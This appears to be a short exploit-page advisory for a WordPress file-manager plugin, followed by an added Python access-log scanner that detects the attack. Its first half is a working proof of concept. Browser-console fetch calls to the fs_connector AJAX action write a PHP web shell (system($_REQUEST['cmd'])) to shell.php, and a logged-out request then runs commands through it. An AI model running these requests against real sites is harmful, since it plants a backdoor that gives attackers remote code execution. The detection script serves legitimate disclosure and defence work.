## https://sploitus.com/exploit?id=WPEX-ID:D4DAF0E1-8018-448A-964C-427A355E005F
As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):

```js
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );
```

Now a logged-out attacker may access `shell.php` as follows:

```js
await (await fetch( "/shell.php?cmd=id" ) ).text()
```
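For detection, the two requests above leave a recognisable trace in the web server access log because they are plain GETs with every parameter in the query string. The following is an added example, not part of the original advisory: a log scanner that flags `fs_connector` write commands that create or fill a PHP file. It assumes combined-format access logs; the sample lines are constructed, and the names `scan` and `decode_target` are hypothetical. The `target` values on the page decode as base64 after the `l1_` prefix (`Lw` is `/`, `c2hlbGwucGhw` is `shell.php`).

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format assumed, not real traffic).
AJAX = "/wp-admin/admin-ajax.php?action="
SAMPLE_LOG = [
    f'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET {AJAX}fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw HTTP/1.1" 200 120',
    f'203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET {AJAX}fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%201 HTTP/1.1" 200 80',
    f'198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET {AJAX}fs_connector&cmd=mkfile&name=notes.txt&target=l1_Lw HTTP/1.1" 200 118',
    f'198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET {AJAX}heartbeat HTTP/1.1" 200 40',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
WRITE_CMDS = {"mkfile", "put"}  # the two commands used on the page
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def decode_target(target):
    """Decode '<volume>_<base64 path>' values such as l1_c2hlbGwucGhw."""
    _, _, b64 = target.partition("_")
    try:
        raw = base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4))
    except ValueError:  # malformed base64: treat as undecodable
        return ""
    return raw.decode("utf-8", "replace")

def scan(lines):
    """Return (cmd, file, reasons) for fs_connector writes that look like code drops."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        q = {k: v[0] for k, v in parse_qs(url.query).items()}
        if not url.path.endswith("/admin-ajax.php") or q.get("action") != "fs_connector":
            continue
        if q.get("cmd") not in WRITE_CMDS:
            continue
        path = decode_target(q.get("target", ""))
        reasons = []
        if EXEC_EXT.search(q.get("name", "")) or EXEC_EXT.search(path):
            reasons.append("executable extension")
        if "<?" in q.get("content", ""):
            reasons.append("PHP open tag in content")
        if reasons:
            findings.append((q["cmd"], q.get("name") or path, reasons))
    return findings
```

Requests sent as POST carry their parameters in the body, which access logs do not record, so this check only covers the query-string form shown above.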